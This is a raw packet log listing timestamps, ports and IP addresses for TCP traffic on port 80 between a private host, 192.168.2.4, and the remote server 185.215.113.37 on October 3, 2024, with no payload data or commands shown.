Oct 3, 2024 18:38:20.836682081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.836695910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.836719036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.836730003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.836760044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.836764097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.836795092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.836798906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.836813927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.836834908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.836852074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.836869955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.836884975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.836920023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.837423086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.837455988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.837481022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.837491035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.837507010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.837526083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.837549925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.837559938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.837584019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.837593079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.837616920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.837626934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.837646008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.837661982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.837694883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.837709904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.837728977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.837747097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.837760925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.837784052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.837810993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.838229895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.838283062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.838385105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.838418961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.838454008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.838470936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.838488102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.838506937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.838520050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.838553905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.838553905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.838574886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.838587999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.838606119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.838622093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.838639021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.838654995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.838674068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.838689089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.838706017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.838737011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.839298964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.839333057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.839353085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.839370012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.839392900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.839426041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.839430094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.839466095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.839498043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.839509964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.839531898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.839531898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.839562893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.839565992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.839600086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.839606047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.839629889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.839632988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.839652061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.839667082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.839730978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.840186119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.840214968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.840229988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.840240002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.840246916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.840260029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.840262890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.840280056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.840282917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.840296030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.840311050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.840312958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.840328932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.840344906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.840349913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.840362072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.840374947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.840379000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.840394974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.840408087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.840410948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.840434074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.840446949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.840486050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.924087048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924141884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924175024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924207926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.924246073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.924396038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924428940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924453020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924465895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.924468994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924488068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924490929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.924519062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.924568892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.924787998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924803972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924819946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924834013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924849987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924856901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.924865007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924880981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924889088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924896002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.924896955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924912930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.924928904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.924949884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.924981117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.925379038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.925546885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.925548077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.925563097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.925578117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.925592899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.925595045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.925607920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.925617933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.925623894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.925638914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.925640106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.925656080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.925671101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.925676107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.925687075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.925698042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.925704002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.925719023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.925751925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.926369905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.926384926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.926399946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.926413059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.926414013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.926430941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.926446915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.926460981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.926462889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.926497936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.926515102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.926990986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927006006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927020073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927035093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927050114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927052021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.927064896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927073956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.927083015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927097082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.927098036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927114964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927129030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927130938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.927148104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927155018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.927175999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.927206993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.927783966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927799940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927814007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927829027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927838087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.927844048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927860975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927872896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.927882910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927897930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927906990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.927912951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.927930117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.927970886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.928695917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.928710938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.928725004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.928740025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.928755999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.928771019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.928771019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.928787947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.928802013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.928802967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.928818941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.928826094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.928833961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.928849936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.928868055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.928908110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.929586887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.929603100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.929616928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.929632902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.929646969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.929651976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.929662943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.929677963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.929692030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.929696083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.929707050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.929717064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.929723024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.929738998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.929738998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.929773092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.929805040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.930382967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.930398941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.930413961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.930428028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.930442095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.930447102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.930457115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.930471897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.930485964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.930488110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.930500984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.930510998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.930516005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.930531025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.930533886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.930568933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.931155920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.931171894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.931186914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.931201935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.931216002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.931219101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.931231976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.931258917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.931273937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.986705065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.994443893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.210495949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.210556984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.210578918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.210591078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.210608959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.210625887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.210640907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.210663080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.210685015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.210697889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.210712910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.210731030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.210758924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.210763931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.210796118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.210797071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.210818052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.210832119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.210865021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.210892916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.210900068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.210927010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.210937023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.210959911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.210993052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.211194038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.211226940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.211251020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.211278915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.211281061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.211311102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.211344957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.211359978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.211400032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.211463928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.211513996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.211513996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.211548090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.211564064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.211580038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.211599112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.211612940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.211647987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.211648941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.211667061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.211683989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.211698055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.211725950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.211977005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212009907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212028980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.212043047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212066889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.212075949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212097883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.212110043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212135077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.212147951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212174892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.212182045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212199926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.212217093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212240934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.212250948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212275028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.212299109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.212708950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212743044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212776899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212809086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.212810040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212843895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212846994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.212877989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212883949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.212910891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.212913990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212934017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.212948084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.212966919 CEST	49730	80	192.168.2.4	185.215.113.37
